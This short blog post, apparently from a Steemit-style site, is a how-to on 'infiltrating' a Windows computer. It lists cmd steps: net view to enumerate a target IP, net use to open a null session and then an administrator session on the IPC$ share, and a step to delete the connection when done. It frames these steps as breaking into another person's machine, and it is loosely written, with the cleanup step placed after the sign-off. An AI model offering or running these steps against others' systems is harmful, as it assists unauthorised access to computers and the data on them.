Windows Operation System Infiltration without a Program

in #programming7 years ago



Hi everyone.  I want to enter the subject.


I want to give you some information on how to access a computer system. 

I have something to say You need to know the IP address and Password of the computer you want to infiltrate.


First we open the command system(cmd):


"start/run/cmd"


Code:

1. net view IP ADRESS HERE

2. net use IP ADRESS HERE\ipc$ /u:"" ""

3.net use IP ADRESS HERE\ipc$ /delete

4.net use IP ADRESS HERE\ipc$ /u:”administrator” “Password HERE”


Now You are connected to the other side's computer

Note: after your work is over enter this code and exit.


I hope this subject is useful for you...


Follow me for more...


5.net use IP ADRESS HERE\ipc$ /delete


Coin Marketplace

STEEM 0.20
TRX 0.13
JST 0.030
BTC 65092.40
ETH 3470.06
USDT 1.00
SBD 2.50